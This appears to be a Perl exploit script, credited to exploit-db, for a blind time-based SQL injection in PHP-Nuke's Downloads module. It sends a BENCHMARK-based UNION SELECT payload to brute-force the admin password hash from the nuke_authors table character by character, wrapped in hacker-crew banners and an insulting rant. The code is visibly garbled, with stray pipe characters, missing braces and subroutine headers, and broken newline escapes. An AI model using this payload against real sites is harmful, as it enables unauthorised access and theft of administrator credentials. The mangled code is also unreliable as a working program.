#!/usr/bin/perl
# [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection |
# Date: 2010.07.04 after 50 days the bug was discovered. |
# Author/s: Dante90, WaRWolFz Crew |
# Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, |
# Shades Master, V1R5, yeat |
# Special Greetings To: The:Paradox |
# Greetings To: Shotokan-The Hacker, _mRkZ_, h473 |
# Web Site: www.warwolfz.org |
# My Wagend (Dante90): dante90wwz.altervista.org |
# Why have I decided to publish this? |
# Because some nice guys (Dr.0rYX and Cr3w-DZ) have ripped and published |
# my own exploit, with their names. |
# FU**ING LAMERS / RIPPERS / SCRIPT KIDDIE |
my $Victime = shift or &usage; |
my ($Referer,$Time,$Response); |
my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102); |
my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link |
my $Method = HTTP::Request->new(POST => $HostName.'modules.php?name=Downloads&d_op=Add'); |
my $Cookies = new HTTP::Cookies; |
my $UserAgent = new LWP::UserAgent( |
default_headers => HTTP::Headers->new, |
my $WaRWolFz = "http://www.warwolfz.org/"; |
my $DefaultTime = request($WaRWolFz); |
sub Blind_SQL_Jnjection { |
my ($dec,$hex,$Victime) = @_; |
return "http://www.warwolfz.org/' UNION/**/SELECT IF(SUBSTRING(pwd,${dec},1)=CHAR(${hex}),benchmark(250000000,CHAR(0)),0) FROM nuke_authors WHERE aid='${Victime}"; |
for(my $I=1; $I<=32; $I++){ #N Hash characters |
for(my $J=0; $J<=15; $J++){ #0 -> F |
$Post = Blind_SQL_Jnjection($I,$chars[$J],$Victime); |
refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I); |
refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I); |
syswrite(STDOUT,chr($chars[$J])); |
$Hash .= chr($chars[$J]); |
refresh($HostName, $DefaultTime, $chars[$J], $Hash, $Time, $I); |
if($I == 1 && length $Hash < 1 && !$Hash){ |
print " * Exploit Failed *n"; |
print " -------------------------------------------------------- n"; |
print " * Exploit Successfully Executed *n"; |
print " -------------------------------------------------------- n"; |
$Start = Time::HiRes::time(); |
my $Response = $UserAgent->post($HostName.'modules.php?name=Downloads&d_op=Add', { |
description => "WaRWolFz Crew", |
email => "dante90.dmc4@hotmail.it", |
homepage => "http://www.warwolfz.org/", |
Referer => $HostName.'modules.php?name=Downloads&d_op=Add'); |
$Response->is_success() or die "$HostName : ", $Response->message, "n"; |
$End = Time::HiRes::time(); |
print " n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploitn"; |
print " -------------------------------------------------------- n"; |
print " * cd [Local Disk]:\[Directory Of Exploit]\ *n"; |
print " * perl name_exploit.pl [victime] *n"; |
print " -------------------------------------------------------- n"; |
print " * Powered By Dante90, WaRWolFz Crew *n"; |
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *n"; |
print " ------------------------------------------------------- n"; |
print " n [0-Day] PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection Exploitn"; |
print " -------------------------------------------------------- n"; |
print " * cd [Local Disk]:\[Directory Of Exploit]\ *n"; |
print " * perl name_exploit.pl [victime] *n"; |
print " -------------------------------------------------------- n"; |
print " * Powered By Dante90, WaRWolFz Crew *n"; |
print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *n"; |
print " ------------------------------------------------------- n"; |
print " * Victime Site: " . $_[0] . "n"; |
print " * Default Time: " . $_[1] . " secondsn"; |
print " * BruteForcing Hash: " . chr($_[2]) . "n"; |
print " * BruteForcing N Char Hash: " . $_[5] . "n"; |
print " * SQL Time: " . $_[4] . " secondsn"; |
print " * Hash: " . $_[3] . "n"; |
#WaRWolFz Crew
Fonte: http://www.exploit-db.com/exploits/18148/